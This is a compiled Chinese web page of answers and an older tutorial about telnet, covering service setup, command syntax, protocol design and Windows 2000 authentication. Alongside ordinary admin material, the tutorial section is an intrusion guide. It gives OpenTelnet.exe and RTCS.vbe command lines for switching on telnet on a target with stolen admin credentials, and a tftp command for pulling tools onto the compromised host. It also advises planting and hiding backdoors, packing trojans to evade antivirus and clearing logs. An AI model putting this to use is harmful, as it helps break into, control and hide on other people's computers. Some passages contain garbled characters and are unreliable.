远程命令telnet(远程命令mstsc admin)

telnet IP地址端口号不过对方必须要开启telnet服务，而telnet的端口号一般为21，如：telnet12.15.17.2221在需要远程控制的电脑上设置如下1.确保启动相应的服务项目。本来远程桌面需要的服务项目是默认开启的，但我自己以前曾经将系统服务减少以保证运行速度和安全。所以在此使用过程中发现了麻烦所在，尝试了半天，终于还是确认了需要开启以下服务项目才能进行远程登录。2.必须启动所需的服务才可以继续设置。开启服务的方法：我的电脑-控制面板-管理工具-服务。3.远程登录需要的服务项目：ServerTerminalServicesTelnetNTLMSecuritySupportProvider（Telnet需要依存与此服务，因此需要先启动此服务）4.取消防火墙对远程控制的限制。不会设置就关了。5.添加远程登录桌面用户：依次点击“开始——所有程序——管理工具——计算机管理”；在系统工具中点击“本地用户和组”，双击右边的“用户”；在右边空白处右击后选择“新用户”，在弹出的对话框中输入“用户名、全名、密码、确认密码”，其他的自己可以做设置。然后确定退出。6. 开启远程登录设置：右击我的电脑——属性——远程——远程桌面——在“允许用户远程连接到此计算机”前打勾。确定后即可在远程机上登录了。
如果telnet服务器使用的默认端口23，则直接使用telnet命令登陆开启telnet服务的服务器。 telnetip示例：telnet192.168.5.130按回车键即可建立telnet连接。如果telnet服务修改了端口则需使用在后面接上端口号。telnetipport示例：telnet192.165.5.1302323按回车键即可建立telnet连接，其中2323是telnet服务器的非默认端口。 连接建立成功后，输入帐号和密码，回车登陆即可。
对于私有地址想通过外部连接访问：必须有NAT转换（仅仅是IP映射，不包含端口号），或者NAPT转换（将私有IP地址映射为公有ip地址+端口号）转换。所以想要从外部通过IP地址telnet远程电脑，那就需要知道NAT转换表的信息，你可以查询一下远程电脑IP对应的公有地址以及映射出去的端口号。然后再telnet ipport 一般很难知道转换出去的端口号，需要转换一下方法，和远程的朋友联系一下，要他使用一个工具“nat123”将自己的telnet端口号23映射出来。。这个工具使用，百度一下就知道了。
首先要让对方打开telnet服务，控制面板-管理工具-服务-找到telnet-右击-启动类型-手动-确定 然后再右击telnet-启动-确定然后你的电脑上也要开放这个服务 最好再把防火墙关了，dos里面telnet,ok
telnet IP地址端口号不过对方必须要开启telnet服务，而telnet的端口号一般为21，如：telnet12.15.17.2221 如果连上后再输入高级管理员的用户名和密码。然后你就可以做你想做的事了。

远程登录是UNIX 命令，它允许授权用户进入网络中的其它 UNIX 机器并且就像用户在现场操作一样。一旦进入主机，用户可以操作主机允许的任何事情，比如：读文件、编辑文件或删除文件等。远程登录的方式有三种，分别是telnet、ssh和vnc的方式。可以使用户坐在联网的主机键盘前，登录进入远距离的另一联网主机，成为那台主机的终端。这使用户可以方便地操纵世界另一端的主机，就像它就在身边一样。方式解析1、telnetTelnet是进行远程登录的标准协议，它把用户正在使用的终端变成网络某一远程主机的仿真终端，使得用户可以方便地使用远程主机上的软、硬件资源。但telnet有一个致命的缺陷，就是Telnet协议使用明文的方式传送所有的数据（包括账号和口令）。2、SSHSSH是目前通常使用的远程管理协议，通过SSH可以安全地访问服务器。SSH基于成熟的公钥加密体系，把所有传输的数据进行加密，保证数据在传输时不被恶意破坏、漏露和篡改。Linux下广泛使用免费的OpenSSH程序来实现SS协议，它同时支持SSH1和SSH2协议。3、VNCVNC是virtual network computing的缩写，由Olivetti & Oracle研究室所开发，并以GPL方式开源。VNC原理与上述两者不同，Telnet和SSH服务只能实现基于文本的远程控制，利用VNC可以实现图形化的远程控制。其使用RFB协议分享显示屏画面，并可跨平台使用。默认使用TCP端口5900至5906，服务端可以在5900口用“监听模式”连接一个客户端，使用监听模式的一个好处是服务端不需要设置防火墙。
目录： 一 摘要二 远程登录三 Telnet协议四 Win2000的Telnet服务五 在telnet中该做什么六 结束语一 摘要Telnet的应用不仅方便了我们进行远程登录，也给hacker们提供了又一种入侵手段和后门，但无论如何，在你尽情享受Telnet所带给你的便捷的同时，你是否真正的了解Telnet呢？二 远程登录Telnet服务虽然也属于客户机/服务器模型的服务，但它更大的意义在于实现了基于Telnet协议的远程登录（远程交互式计算），那么就让我们来认识一下远程登录。1 远程登陆的基本概念先来看看什么叫登录：分时系统允许多个用户同时使用一台计算机，为了保证系统的安全和记帐方便，系统要求每个用户有单独的帐号作为登录标识，系统还为每个用户指定了一个口令。用户在使用该系统之前要输入标识和口令，这个过程被称为'登录'。远程登陆是指用户使用Telnet命令，使自己的计算机暂时成为远程主机的一个仿真终端的过程。仿真终端等效于一个非智能的机器，它只负责把用户输入的每个字符传递给主机，再将主机输出的每个信息回显在屏幕上。2 远程登陆的产生及发展我们可以先构想一个提供远程文字编辑的服务，这个服务的实现需要一个接受编辑文件请求和数据的服务器以及一个发送此请求的客户机。客户机将建立一个从本地机到服务器的TCP连接，当然这需要服务器的应答，然后向服务器发送键入的信息（文件编辑信息），并读取从服务器返回的输出。以上便是一个标准而普通的客户机/服务器模型的服务。似乎有了客户机/服务器模型的服务，一切远程问题都可以解决了。然而实际并非你想象的那样简单，如果我们仅需要远程编辑文件，那么刚才所构想的服务完全可以胜任，但假如我们的要求并不是这么简单，我们还想实现远程用户管理，远程数据录入，远程系统维护，想实现一切可以在远程主机上实现的操作，那么我们将需要大量专用的服务器程序并为每一个可计算服务都使用一个服务器进程，随之而来的问题是：远程机器会很快对服务器进程应接不暇，并淹没在进程的海洋里（我们在这里排除最专业化的远程机器）。那么有没有办法解决呢？当然有，我们可以用远程登录来解决这一切。我们允许用户在远地机器上建立一个登录会话，然后通过执行命令来实现更一般的服务，就像在本地操作一样。这样，我们便可以访问远地系统上所有可用的命令，并且系统设计员不需提供多个专用地服务器程序。问题发展到这里好像前途一片光明了，用远程登录总应该解决问题了吧，但要实现远程登陆并不简单。不考虑网络设计的计算机系统期望用户只从直接相连的键盘和显示器上登录，在这种机器上增加远程登陆功能需要修改机器的操作系统，这是极其艰巨也是我们尽量避免的。因此我们应该集中力量构造远程登陆服务器软件，虽然这样也是比较困难的。为什么说这样做也比较困难呢？举个例子来说：一般，操作系统会为一些特殊按键分配特殊的含义，比如本地系统将'Ctrl+C'解释为：'终止当前运行的命令进程'。但假设我们已经运行了远程登陆服务器软件，'Ctrl+C'也有可能无法被传送到远地机器，如果客户机真的将'Ctrl+C'传到了远地机器，那么'Ctrl+C'这个命令有可能不能终止本地的进程，也就是说在这里很可能会产生混乱。而且这仅仅是遇到的难题之一。但尽管有技术上的困难，系统编程人员还是设法构造了能够应用于大多数操作系统的远程登陆服务器软件，并构造了充当客户机的应用软件。通常，客户机软件取消了除一个键以外的所有键的本地解释，并将这些本地解释相应的转换成远地解释，这就使得客户机软件与远地机器的交互，就如同坐在远程主机面前一样，从而避免了上述所提到的混乱。而那个唯一例外的键，可以使用户回到本地环境。将远程登陆服务器设计为应用级软件，还有另一个要求，那就是需要操作系统提供对伪终端（pseudo terminal）的支持。我们用伪终端描述操作系统的入口点，它允许像Telnet服务器一样的程序向操作系统传送字符，并且使得字符像是来自本地键盘一样。只有使用这样的操作系统，才能将远程登陆服务器设计为应用级软件（比如Telnet服务器软件），否则，本地操作系统和远地系统传送将不能识别从对方传送过来的信息（因为它们仅能识别从本地键盘所键入的信息），远程登陆将宣告失败。将远程登陆服务器设计为应用级软件虽然有其显著的优点：比将代码嵌入操作系统更易修改和控制服务器。但其也有效率不高的缺点（后面的内容将会给予解释），好在用户键入信息的速率不高，这种设计还是可以接受的。3 远程登录的工作过程使用Telnet协议进行远程登陆时需要满足以下条件：在本的计算机上必须装有包含Telnet协议的客户程序；必须知道远程主机的Ip地址或域名；必须知道登录标识与口令。Telnet远程登录服务分为以下4个过程：1）本地与远程主机建立连接。该过程实际上是建立一个TCP连接，用户必须知道远程主机的Ip地址或域名；2）将本地终端上输入的用户名和口令及以后输入的任何命令或字符以NVT（Net Virtual Terminal）格式传送到远程主机。该过程实际上是从本地主机向远程主机发送一个IP数据报；3）将远程主机输出的NVT格式的数据转化为本地所接受的格式送回本地终端，包括输入命令回显和命令执行结果；4）最后，本地终端对远程主机进行撤消连接。该过程是撤销一个TCP连接。上面的内容只是讨论了远程登陆最基本的东西，其中的复杂和编程人员的艰辛是我们难以想象的，不知道你在舒服的使用Telnet的同时，是否想到了这些！三 Telnet协议我们知道Telnet服务器软件是我们最常用的远程登录服务器软件，是一种典型的客户机/服务器模型的服务，它应用Telnet协议来工作。那么，什么是Telnet协议？它都具备哪些特点呢？1 基本内容Telnet协议是TCP/IP协议族中的一员，是Internet远程登陆服务的标准协议。应用Telnet协议能够把本地用户所使用的计算机变成远程主机系统的一个终端。它提供了三种基本服务：1）Telnet定义一个网络虚拟终端为远的系统提供一个标准接口。客户机程序不必详细了解远的系统，他们只需构造使用标准接口的程序；2）Telnet包括一个允许客户机和服务器协商选项的机制，而且它还提供一组标准选项；3）Telnet对称处理连接的两端，即Telnet不强迫客户机从键盘输入，也不强迫客户机在屏幕上显示输出。2 适应异构为了使多个操作系统间的Telnet交互操作成为可能，就必须详细了解异构计算机和操作系统。比如，一些操作系统需要每行文本用ASCII回车控制符（CR）结束，另一些系统则需要使用ASCII换行符（LF），还有一些系统需要用两个字符的序列回车-换行（CR-LF）；再比如，大多数操作系统为用户提供了一个中断程序运行的快捷键，但这个快捷键在各个系统中有可能不同（一些系统使用CTRL+C，而另一些系统使用ESCAPE）。如果不考虑系统间的异构性，那么在本地发出的字符或命令，传送到远地并被远地系统解释后很可能会不准确或者出现错误。因此，Telnet协议必须解决这个问题。为了适应异构环境，Telnet协议定义了数据和命令在Internet上的传输方式，此定义被称作网络虚拟终端NVT（Net Virtual Terminal）。它的应用过程如下：对于发送的数据：客户机软件把来自用户终端的按键和命令序列转换为NVT格式，并发送到服务器，服务器软件将收到的数据和命令，从NVT格式转换为远地系统需要的格式；对于返回的数据：远地服务器将数据从远地机器的格式转换为NVT格式，而本地客户机将将接收到的NVT格式数据再转换为本地的格式。对于NVT格式的详细定义，有兴趣的朋友可以去查找相关资料。3 传送远地命令我们知道绝大多数操作系统都提供各种快捷键来实现相应的控制命令，当用户在本地终端键入这些快捷键的时候，本地系统将执行相应的控制命令，而不把这些快捷键作为输入。那么对于Telnet来说，它是用什么来实现控制命令的远地传送呢？Telnet同样使用NVT来定义如何从客户机将控制功能传送到服务器。我们知道USASCII字符集包括95个可打印字符和33个控制码。当用户从本地键入普通字符时，NVT将按照其原始含义传送；当用户键入快捷键（组合键）时，NVT将把它转化为特殊的ASCII字符在网络上传送，并在其到达远地机器后转化为相应的控制命令。将正常ASCII字符集与控制命令区分主要有两个原因：1）这种区分意味着Telnet具有更大的灵活性：它可在客户机与服务器间传送所有可能的ASCII字符以及所有控制功能；2）这种区分使得客户机可以无二义性的指定信令，而不会产生控制功能与普通字符的混乱。4 数据流向上面我们提到过将Telnet设计为应用级软件有一个缺点，那就是：效率不高。这是为什么呢？下面给出Telnet中的数据流向：数据信息被用户从本地键盘键入并通过操作系统传到客户机程序，客户机程序将其处理后返回操作系统，并由操作系统经过网络传送到远地机器，远地操作系统将所接收数据传给服务器程序，并经服务器程序再次处理后返回到操作系统上的伪终端入口点，最后，远地操作系统将数据传送到用户正在运行的应用程序，这便是一次完整的输入过程；输出将按照同一通路从服务器传送到客户机。因为每一次的输入和输出，计算机将切换进程环境好几次，这个开销是很昂贵的。还好用户的键入速率并不算高，这个缺点我们仍然能够接受。5 强制命令我们应该考虑到这样一种情况：假设本地用户运行了远地机器的一个无休止循环的错误命令或程序，且此命令或程序已经停止读取输入，那么操作系统的缓冲区可能因此而被占满，如果这样，远地服务器也无法再将数据写入伪终端，并且最终导致停止从TCP连接读取数据，TCP连接的缓冲区最终也会被占满，从而导致阻止数据流流入此连接。如果以上事情真的发生了，那么本地用户将失去对远地机器的控制。为了解决此问题，Telnet协议必须使用外带信令以便强制服务器读取一个控制命令。我们知道TCP用紧急数据机制实现外带数据信令，那么Telnet只要再附加一个被称为数据标记(date mark)的保留八位组，并通过让TCP发送已设置紧急数据比特的报文段通知服务器便可以了，携带紧急数据的报文段将绕过流量控制直接到达服务器。作为对紧急信令的相应，服务器将读取并抛弃所有数据，直到找到了一个数据标记。服务器在遇到了数据标记后将返回正常的处理过程。6 选项协商由于Telnet两端的机器和操作系统的异构性，使得Telnet不可能也不应该严格规定每一个telnet连接的详细配置，否则将大大影响Telnet的适应异构性。因此，Telnet采用选项协商机制来解决这一问题。Telnet选项的范围很广：一些选项扩充了大方向的功能，而一些选项制涉及一些微小细节。例如：有一个选项可以控制Telnet是在半双工还是全双工模式下工作（大方向）；还有一个选项允许远地机器上的服务器决定用户终端类型（小细节）。Telnet选项的协商方式也很有意思，它对于每个选项的处理都是对称的，即任何一端都可以发出协商申请；任何一端都可以接受或拒绝这个申请。另外，如果一端试图协商另一端不了解的选项，接受请求的一端可简单的拒绝协商。因此，有可能将更新，更复杂的Telnet客户机服务器版本与较老的，不太复杂的版本进行交互操作。如果客户机和服务器都理解新的选项，可能会对交互有所改善。否则，它们将一起转到效率较低但可工作的方式下运行。所有的这些设计，都是为了增强适应异构性，可见Telnet的适应异构性对其的应用和发展是多么重要。上面讨论了一些原理方面的东西，虽然我们在Telnet的使用过程中很难接触到这一层面，但我认为了解这些是有意义的，它会给我们带来许多启示。下面让我们来看看Win2000的Telnet服务。（本系列教程不定期更新，欲获得最新版本，请登陆官方网站：菜菜鸟社区http://ccbirds.yeah.net）四 Win2000的Telnet服务其实从应用层面上，Win2000的Telnet服务并没有什么可说的，绝大部分内容你都可以从HELP文件中得到，我在此只是把它稍微整理一下而已。1 基本配置Win2000为我们提供了Telnet客户机和服务器程序：Telnet.exe是客户机程序（Client），tlntsvr.exe是服务器程序（server），同时它还为我们提供了Telnet服务器管理程序tlntadmn.exe。Windows 2000 默认安装了 Telnet 服务，但是并没有默认启动。下面给出HELP文件中 Telnet 服务的一部分默认设置：AllowTrustedDomain：是否允许域用户访问。默认值是1，允许信任域用户访问。可以改为0: 不允许域用户访问（只允许本地用户）。DefaultDomain：可以对与该计算机具有信任关系的任何域设置。默认值是"."。DefaultShell：显示 shell 安装的路径位置。默认值是： %systemroot%System32Cmd.exe /q /kMaxFailedLogins：在连接终止之前显示尝试登录失败的最大次数。默认是3。LoginScript：显示 Telnet 服务器登录脚本的路径位置。默认的位置就是“%systemroot%System32login.cmd”，你可以更改脚本内容，这样登录进Telnet的欢迎屏幕就不一样了。NTLM：NTLM身份验证选项。默认是2。可以有下面这些值：0: 不使用 NTLM 身份验证。1: 先尝试 NTLM 身份验证，如果失败，再使用用户名和密码。2: 只使用 NTLM 身份验证。TelnetPort：显示 telnet 服务器侦听 telnet 请求的端口。默认是：23。你也可以更改为其他端口。以上各项设置你可以使用tlntadmn.exe（Telnet服务器管理程序）来进行非常方便的配置，配置后需要重新启动Telnet服务。如图12 NTLM提到了telnet就不能不提NTLM，我想这也是让入侵者最为头痛的一件事，哪怕你获得了管理员帐号和密码，想简单通过NTLM也并非易事，况且win2000中的telnet默认仅以NTLM方式验证身份，这就让我们不得不关注NTLM这个东东，那么什么是NTLM呢？早期的SMB协议在网络上明文传输口令，后来出现了"LAN Manager Challenge/Response"验证机制，简称LM，它十分简单以至很容易被破解，微软随后提出了WindowsNT挑战/响应验证机制，即NTLM。现在已经有了更新的NTLMv2以及Kerberos验证体系。NTLM工作流程是这样的：1、客户端首先在本地加密当前用户的密码成为密码散列2、客户端向服务器发送自己的帐号，这个帐号是没有经过加密的，明文直接传输3、服务器产生一个16位的随机数字发送给客户端，作为一个 challenge（挑战）4、客户端再用加密后的密码散列来加密这个 challenge ，然后把这个返回给服务器。作为 response（响应）5、服务器把用户名、给客户端的challenge 、客户端返回的 response 这三个东西，发送域控制器6、域控制器用这个用户名在 SAM密码管理库中找到这个用户的密码散列，然后使用这个密码散列来加密 challenge。7、域控制器比较两次加密的 challenge ，如果一样，那么认证成功。从上面的过程我们可以看出，NTLM是以当前用户的身份向Telnet服务器发送登录请求的，而不是用你扫到的对方管理员的帐户和密码登录，显然，你的登录将会失败。举个例子来说，你家的机器名为A（本地机器），你入侵的机器名为B（远地机器），你在A上的帐户是xinxin，密码是1234，你扫到B的管理员帐号是Administrator，密码是5678，当你想Telnet到B时，NTLM将自动以当前用户的帐号和密码作为登录的凭据来进行上面的7项操作，即用xinxin和1234，而并非用你扫到的Administrator和5678，且这些都是自动完成的，根本不给你插手的机会，因此你的登录操作将失败。由于Telnet服务器对NTLM的使用有3个选项，所以当你Telnet远地机器时，会显示下面情况中的一种：1)身份验证选项=0时=====================================Microsoft (R) Windows (TM) Version 5.00 (Build 2195)Welcome to Microsoft Telnet ServiceTelnet Server Build 5.00.99201.1login:password:\为0时不使用NTML身份验证，直接输入用户名和密码，比如你可以输入扫到的Administrator和56782)身份验证选项=1时=====================================NTLM Authentication failed due to insufficient credentials. Please login withclear text username and passwordMicrosoft (R) Windows (TM) Version 5.00 (Build 2195)Welcome to Microsoft Telnet ServiceTelnet Server Build 5.00.99201.1login:password:\先尝试 NTLM 身份验证，如果失败，再使用用户名和密码，其实这种方式对于我们来说，与上一种方式没什么区别3)身份验证选项=2时=====================================NTLM Authentication failed due to insufficient credentials. Please login withclear text username and passwordServer allows NTLM authentication onlyServer has closed connection遗失对主机的连接。C:>\仔细看看上面的显示，根本没有给你输入用户名和密码的机会，直接断开连接，扫到了密码也是白扫所以对于入侵者来说，NTLM是横在我们面前的一座大山，必须要除掉它，一般我们有如下几种方法：1通过修改远程注册表更改telnet服务器配置，将验证方式从2改为1或0；2使用NTLM.exe，上传后直接运行，可将telnet服务器验证方式从2改为1；3在本地建立扫描到的用户，以此用户身份开启telnet客户机并进行远程登录；4使用软件，比如opentelnet.exe（需要管理员权限且开启IPC管道）5使用脚本，如RTCS，（需要管理员权限但不依赖IPC管道）基本上是以上的5种，其中后两种是我们比较常用的开telnet的手法，而且使用方法十分简单，命令如下：OpenTelnet.exe \server username password NTLMAuthor telnetportOpenTelnet.exe \服务器地址 管理员用户名 密码 验证方式（填0或1） telnet端口cscript RTCS.vbe targetIP username password NTLMAuthor telnetportcscript RTCS.vbe <目标IP> <管理员用户名> <密码> <验证方式> 五 在telnet中该做什么本来写到上面就想结束了，不过许多朋友都说telnet上去后不知道该做什么了，既然这样，那我就抛砖引玉吧，这次不讲具体做法，只是说说思路，什么？为什么不讲具体做法？篇幅不够嘛，以后我会一一解释的。1 查看系统信息呵呵，其实就是随处看看，看看他的系统配置和版本（用type c:boot.ini来知道pro版或server版），看看都装了什么服务或软件（从目录名就可以知道了），看看有什么重要或有趣的文件啦（唉，要是国外的机器，看也看不懂），看看他的用户情况，总之就是尽可能多的了解系统，为一会装后门摸底。2 使用tftp传送文件想必大家都遇到过在telnet中传输文件的问题，因为我们习惯了在ipc管道中的文件传输，所以有些朋友喜欢用net share ipc$ 来打开管道，进而利用copy来传输文件。不过这样反而麻烦，既然我们已经得到了shell，我们可以用TFPT命令来完成这一切，什么是TFTP呢？用TFTP(Trivial File Transfer Protocol)来实现文件的传送是一种基于UDP连接的文件传输，一般是使用Windows自带的tftp.exe和一个TFTP服务器端软件构成一个完整的传输结构。它是这样使用的： 首先运行本地的TFTP Server（比如tftpd32.exe）软件并保证始终开启直至传输全部完成， 然后在telnet中（当然你也可以在其他shell中）运行下面的命令：C:>tftp –i ip get xinxin.exe c:abcxinxin.exe其中ip为你自己机器的ip，且上传文件要与TFTP服务器端在同一目录下，这样你就可以把xinxin.exe上传到c盘abc目录下了（其实是从tftp服务器下载来的）需要指出的是，如果使用代理IP，你将不能实现与外部网络的文件传送。因为你的代理网关在进行数据封装的时候会将自己的IP地址加入到你的数据报中，代替你的内部网络地址，所以在外部网络进行MAC寻址时是找不到你这台TFTP服务器的。3 安置后门安置后门放在第二步好像早了点，如果你入侵还有其他目的，比如以破坏为主，或者是来修改主页的，那么这些事情当然可以在安置后门之前做；如果你只是想得到一只肉鸡，那就没什么可说的了，安后门吧。后门的种类繁多，也给我们提供了很大的选择余地，能够根据具体情况选择合适的后门的确是一门学问。常用的后门一般有：木马，asp木马，远程控制软件，克隆帐户，建立并隐藏帐户，telnet，telnet扩展的shell，终端服务等。安置一个好的后门通常要注意以下几点：1 不会被防火墙查杀及阻碍通信：被加入病毒库的后门最好加壳以逃过防火墙，尽量用低端口通信，以免被防火墙屏蔽。2 最大限度增加隐蔽性：如果你选择远程控制软件，要注意被控端的安装提示和小图标，以及是否同步画面；如果你在帐户上做文章，要尽量保持在cmd和用户管理中都不出破绽；如果你选择放木马或telnet扩展，要注意文件和进程的隐藏；如果新开了终端服务（入侵前并没有开），一定要该掉3389这个显眼的端口，且越低越好。3 不要当管理员不存在：这是一个大忌，许多朋友在只有默认帐户的机器上建立类似'hacking'的管理员帐户，真是无知者无畏呀。所以安置后门的时候，想想管理员疏忽的地方会在哪里。4 打补丁如果想独霸肉鸡，就要会打补丁，要知道对肉鸡的竞争是很激烈的。怎么打补丁呢？这个也要问？想想你是怎么进来的吧。算了，提示一下，除了修补大的漏洞以外（上传官方补丁并运行），也要注意它的共享，ipc$共享（最好都关闭），可疑端口，容易被利用的服务等。不过打补丁也要注意隐蔽性的，不要让管理员发现大的改动。5 清除日志可以手动或利用软件，如果不太会就去找相关教材吧，在这里我不详细介绍了。六 结束语文章的前部分主要说了一些原理性的东西，后部分则侧重于应用，写的多了难免会有些遗漏，如果你觉得哪里还需要补充，或者哪里不明白，请回帖告诉我哟！！参考资料：http://www.xfocus.net/articles/200307/567.html
Telnet，对方允许的一种登陆方式，几乎没有什么阻碍 可以在dos中登陆吧，也有工具软件 Hacker，在不经过对方允许的情况下，秘密的强行登陆，有“冰河”“灰鸽子”之类的国产木马软件可以实现，但前提是你要用扫描软件获得对方的ip地址，计算机用户名，密码。然后在dos下与对方秘密进行连接，把木马程序发给对方并激活。在使用木马软件就可以登陆对方计算机，获取对方任何密码，查看所有文件，控制对方键盘鼠标，及关机
1，一般用免费的域名解析服务。现在很少人用了，主要原因是压缩率不高，做不了实时，而且对带宽要求较高，再加上近年来新产品的冲击和失去了价格优势。现就是还要一台电脑做主机。 2，模拟摄像机+硬盘录像机（DVR）这种方式目前还是有很多人在采用，因为它与第一种方式比较而言不再需要电脑做监控主机。而且便于存储。特别是对于监控点比较集中的店铺、工厂等小规模的监控系统。3，模拟摄像机+网络视频服务器（DVS） DVS是新一代网络视频编码设备，其更好的网络适应能力和集中管理能力得到市场追捧。特别是大型监控系统工程，如平安城市，大型工厂，小区等。其相比DVR来说，唯一不足就是单台设备可支持摄像机的路数比DVR要少。 4，网络摄像机（IP camera）是近两年来新兴的监控摄像机。网络摄像机完全摆脱了模拟监控的束缚，具有扩展性好、集中管理能力强、施工成本低等优点。并且网络摄像机还可以在WIFI无线网络中传输。是目前市场中最受欢迎的远程监控设备。适合于任何场所。特别是分支机构的远程管理，家庭看护等。不过在一些较为集中的小型监控场所，其价格方面竞争力较低。相信随着市场和技术的成熟，网络摄像机必将统一监控市场。相关技术文章：

1、首先需在电脑中安装好SecureCRT 8.0工具，然后双击桌面的SecureCRT 8.0图标，打开SecureCRT 8.0工具，如图。2、进入到SecureCRT 8.0界面，然后点击菜单栏的“File”，如图所示，3、在弹出的File下拉菜单中选择“Quick Connect”，如图所示。4、然后再进入的Quick Connect对话框中的protocol栏选择协议，如图选中telnet，5、然后在Hostname栏中输入需要登录的IP地址，输入完成之后点击“connect”连接，如图所示，6、远程Telnet登录成功，进入到登录界面，如图所示。7、输入登录名称、登录密码、进入全局模式，之后可以输入命令了，如图所示。
如果telnet服务器使用的默认端口23，则直接使用telnet命令登陆开启telnet服务的服务器。telnet ip示例：telnet 192.168.5.130 按回车键即可建立telnet连接。如果telnet服务修改了端口则需使用在后面接上端口号。telnet ip port示例：telnet 192.165.5.130 2323 按回车键即可建立telnet连接，其中2323是telnet服务器的非默认端口。连接建立成功后，输入帐号和密码，回车登陆即可。
telnet targetip targetport 比如 TELNET 127.0.0.1 23这就是连接自己的TELNET服务器23是默认端口 其他的视情况而定

先在运行里键入“services.msc”打开服务，然后打开telnet这个服务，双击这个服务，点开启， 第二种方法，在运行里键入“cmd”，打开命令提示符，然后键入“netstarttelnet”也可以开这个服务，然后你就可以“telnet对该的IP地址”就可以了，不过前提是对该的电脑这个服务也要开的，你可以用“流光”软件里的一个黑客软件来开对该的这个23端口，也可以在对方的电脑里做一个克隆帐户，来珐窢粹喝诔估达台惮郡对对方的电脑里操作，也可以用很多软件扫描对该的电脑端口 来入侵，说白了，这个命令就是用来入侵的，当然，你对DOS命令要熟悉哟！！我试过很多次，成功入侵，不过现在不用这个命令了，现在基本都用软件或其他方法了，呵呵，希望对你有启示！！！
是的。 可以再命令提示符下使用。但是telnet服务一般不会开放。也就是说你可以用telnet远程登录其他telnet主机，但是其他主机不能用telnet登陆你的机器。 但是这年头telnet很少有人用了，不安全。取而代之的是ssh。一般的机器，包括linux主机都很少会开放telnet，但是linux会开放ssh，而且是默认启动服务，因为ssh更安全。
服务下开启telnet服务（一般xp珐窢粹喝诔估达台惮郡系统自动禁用了该服务），然后cmd下telnet就行了，试试...

1、语法telnet(选项)(参数)2、选项-8：允许使用8位字符资料，包括输入与输出；-a：尝试自动登入远端系统；-b<主机别名>：使用别名指定远端主机名称；-c：不读取用户专属目录里的.telnetrc文件；-d：启动排错模式；-e<脱离字符>：设置脱离字符；-E：滤除脱离字符；-f：此参数的效果和指定"-F"参数相同；-F：使用Kerberos V5认证时，加上此参数可把本地主机的认证数据上传到远端主机；-k<域名>：使用Kerberos认证时，加上此参数让远端主机采用指定的领域名，而非该主机的域名；-K：不自动登入远端主机；-l<用户名称>：指定要登入远端主机的用户名称；-L：允许输出8位字符资料；-n<记录文件>：指定文件记录相关信息；-r：使用类似rlogin指令的用户界面；-S<服务类型>：设置telnet连线所需的ip TOS信息；-x：假设主机有支持数据加密的功能，就使用它；-X<认证形态>：关闭指定的认证形态。参数远程主机：指定要登录进行管理的远程主机； 端口：指定TELNET协议使用的端口号。3、参数远程主机：指定要登录进行管理的远程主机；端口：指定TELNET协议使用的端口号。扩展资料：实例：域名无法解析命令：telnet www.baidu.com输出：[root@localhost ~]# telnet www.baidu.comwww.baidu.com/telnet: Temporary failure in name resolution[root@localhost ~]#说明：处理这种情况方法：（1）确认域名是否正确（2）确认本机的域名解析有关的设置是否正确（3）确认防火墙是否放开了UDP53端口的访问参考资料：参考资料来源：百度百科-Telnet
对于Telnet的认识，不同的人持有不同的观点，可以把Telnet当成一种通信协议，但是对于入侵者而言，Telnet只是一种远程登录的工具。一旦入侵者与远程主机建立了Telnet连接，入侵者便可以使用目标主机上的软、硬件资源，而入侵者的本地机只相当于一个只有键盘和显示器的终端而已。 为什么需要telnet？telnet就是查看某个端口是否可访问。我们在搞开发的时候，经常要用的端口就是 8080。那么你可以启动服务器，用telnet 去查看这个端口是否可用。Telnet协议是TCP/IP协议家族中的一员，是Internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序，用它连接到服务器。终端使用者可以在telnet程序中输入命令，这些命令会在服务器上运行，就像直接在服务器的控制台上输入一样。可以在本地就能控制服务器。要开始一个telnet会话，必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。Windows XP怎么执行telnet 命令？1、点击开始　→　运行　→　输入CMD，回车。2、在出来的DOS界面里，输入telnet测试端口命令： telnet IP 端口 或者 telnet 域名 端口，回车。如果端口关闭或者无法连接，则显示不能打开到主机的链接，链接失败；端口打开的情况下，链接成功，则进入telnet页面（全黑的），证明端口可用。Telnet 客户端命常用命令：open : 使用 openhostname 可以建立到主机的 Telnet 连接。close : 使用命令 close 命令可以关闭现有的 Telnet 连接。display : 使用 display 命令可以查看 Telnet 客户端的当前设置。send : 使用 send 命令可以向 Telnet 服务器发送命令。支持以下命令：ao : 放弃输出命令。ayt : “Are you there”命令。esc : 发送当前的转义字符。ip : 中断进程命令。synch : 执行 Telnet 同步操作。brk : 发送信号。上表所列命令以外的其他命令都将以字符串的形式发送至 Telnet 服务器。例如，sendabcd 将发送字符串 abcd 至 Telnet 服务器，这样，Telnet 会话窗口中将出现该字符串。quit ：使用 quit 命令可以退出 Telnet 客户端。telnet用于远程登录到网络中的计算机，并以命令行的方式远程管理计算机。需要注意的是，远程机器必须启动telnet服务器，否则无法打开telnet命令。例如：在命令提示符中输入“telnet 114.80.67.193”，按回车键，但是为了安全起见，要输入“n”并按回车键，出现登录提示符。输入登录名后，按回车键即可登录到远程机器。使用telnet的open子命令远程登录远程机器。命令格式：open hostname[port]，hostname为ip地址，port默认为23。 在telnet提示符下输入“open 114.80.67.193”，按回车键。再输入“n”，根据提示输入用户名和密码即可远程机器上。使用telnet的unset子命令关闭本地回显功能。操作过程：先在命令提示符中输入“telnet”，按回车键；然后输入“setlocalecho”，按回车键，即可打开本地回显功能；如要关闭回显能力，只要在telnet命令提示符后输入“unsetlocalecho”，按回车。使用telnet的status子命令查看连接状态。操作过程： 输入“telnet”进入telnet命令，再输入“status”，按回车，此时显示当前已经登录到IP为114.80.67.193的机器上。为什么在Vista/Win7 下不能够使用telnet？Vista/Windows 7怎么执行telnet 命令？Windows 7提示：telnet不是内部或外部命令，怎么办？一般只有Windows 7才会出现这种情况，这里主要说下Windows7怎么解决。在Win7不能够使用的主要原因是由于win7默认情况下是没有安装telnet服务，所以我们需要安装telnet服务。怎么安装呢？很简单，只需要您简单的做如下操作： 开始　→　控制面板　→　程序和功能　→　打开或关闭Windows功能，在这里就可以看到“telnet服务器”和“telnet客服端”。